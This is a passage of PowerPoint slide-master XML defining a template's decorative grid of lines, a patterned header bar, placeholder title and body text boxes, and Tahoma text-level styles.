                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="288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52" name="Line 20"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="307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53" name="Line 21"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="326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54" name="Line 22"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="345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55" name="Line 23"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="364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56" name="Line 24"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="384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57" name="Line 25"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="403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58" name="Line 26"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="422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grpSp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="5" name="Group 27"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="192" y="0"/>
                <a:ext cx="5376" cy="4320"/>
                <a:chOff x="192" y="0"/>
                <a:chExt cx="5376" cy="4320"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="1068060" name="Line 28"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="1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61" name="Line 29"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="3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62" name="Line 30"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="5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63" name="Line 31"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="7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64" name="Line 32"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="96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65" name="Line 33"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="115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66" name="Line 34"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="134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67" name="Line 35"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="153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68" name="Line 36"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="172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69" name="Line 37"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="192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70" name="Line 38"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="211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71" name="Line 39"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="230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72" name="Line 40"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="249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73" name="Line 41"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="268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74" name="Line 42"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="288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75" name="Line 43"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="307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76" name="Line 44"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="326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77" name="Line 45"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="345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78" name="Line 46"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="364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79" name="Line 47"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="384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80" name="Line 48"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="403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81" name="Line 49"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="422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82" name="Line 50"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="441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83" name="Line 51"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="460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84" name="Line 52"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="480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85" name="Line 53"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="49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86" name="Line 54"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="51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87" name="Line 55"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="53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88" name="Line 56"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="55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grpSp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1068089" name="Rectangle 57" descr="60%"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="ltGray">
            <a:xfrm>
              <a:off x="2112" y="0"/>
              <a:ext cx="3648" cy="96"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:pattFill prst="pct60">
              <a:fgClr>
                <a:schemeClr val="folHlink"/>
              </a:fgClr>
              <a:bgClr>
                <a:schemeClr val="bg1"/>
              </a:bgClr>
            </a:pattFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1068090" name="Line 58"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="ltGray">
            <a:xfrm>
              <a:off x="5568" y="0"/>
              <a:ext cx="0" cy="1488"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="hlink"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="6" name="Group 59"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="261" y="892"/>
              <a:ext cx="1124" cy="1464"/>
              <a:chOff x="96" y="916"/>
              <a:chExt cx="2208" cy="2876"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1068092" name="Line 60"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="ltGray">
              <a:xfrm flipH="1">
                <a:off x="96" y="1038"/>
                <a:ext cx="2208" cy="0"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1068093" name="Line 61"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="ltGray">
              <a:xfrm>
                <a:off x="336" y="920"/>
                <a:ext cx="0" cy="2872"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1068094" name="Arc 62"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="ltGray">
              <a:xfrm flipH="1">
                <a:off x="218" y="916"/>
                <a:ext cx="238" cy="240"/>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defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2051" name="Rectangle 63"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="304800"/>
            <a:ext cx="7772400" cy="914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GB"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2052" name="Rectangle 64" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="1600200"/>
            <a:ext cx="777240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48" r:id="rId14"/>
  </p:sldLayoutIdLst>
  <p:hf sldNum="0"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Tahoma" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4000">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4000">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4000">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="457200" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4000">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="914400" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4000">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="1371600" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4000">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="1828800" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="40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hlink"/>
        </a:buClr>
        <a:buSzPct val="110000"/>
        <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
        <a:buBlip>
          <a:blip r:embed="rId16"/>
        </a:buBlip>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hlink"/>
        </a:buClr>
        <a:buSzPct val="95000"/>
        <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
        <a:buChar char="w"/>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6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a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="6858000"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="5760" cy="4320"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="Group 3"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="5760" cy="4320"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="5760" cy="4320"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="4" name="Group 4"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="0" y="192"/>
                <a:ext cx="5760" cy="4032"/>
                <a:chOff x="0" y="192"/>
                <a:chExt cx="5760" cy="4032"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="1068037" name="Line 5"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="19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38" name="Line 6"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="38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39" name="Line 7"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="57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40" name="Line 8"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="76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41" name="Line 9"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="96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42" name="Line 10"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="115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43" name="Line 11"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="134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44" name="Line 12"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="153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45" name="Line 13"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="172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46" name="Line 14"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="192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47" name="Line 15"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="211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48" name="Line 16"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="230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49" name="Line 17"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="249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50" name="Line 18"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="268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51" name="Line 19"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="288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52" name="Line 20"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="307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53" name="Line 21"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="326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54" name="Line 22"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="345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55" name="Line 23"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="364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56" name="Line 24"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="384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57" name="Line 25"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="403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58" name="Line 26"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="422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grpSp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="5" name="Group 27"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="192" y="0"/>
                <a:ext cx="5376" cy="4320"/>
                <a:chOff x="192" y="0"/>
                <a:chExt cx="5376" cy="4320"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="1068060" name="Line 28"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="1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61" name="Line 29"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="3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62" name="Line 30"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="5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63" name="Line 31"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="7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64" name="Line 32"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="96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65" name="Line 33"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="115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66" name="Line 34"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="134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67" name="Line 35"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
